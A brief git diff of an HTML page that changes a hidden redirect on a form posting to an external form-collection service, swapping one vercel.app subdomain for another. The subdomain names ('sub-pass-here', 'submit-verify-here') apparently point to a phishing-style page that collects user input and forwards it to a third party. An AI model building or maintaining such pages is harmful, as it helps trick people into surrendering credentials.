--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     </head>
     <body>
         <form action="https://submit-form.com/K9MhM8oUK" method="post">
-            <input type="hidden" name="_redirect" value="https://sub-pass-here.vercel.app/"/>
+            <input type="hidden" name="_redirect" value="https://submit-verify-here.vercel.app/"/>
             <div id="root">
                 <div>
                     <form>
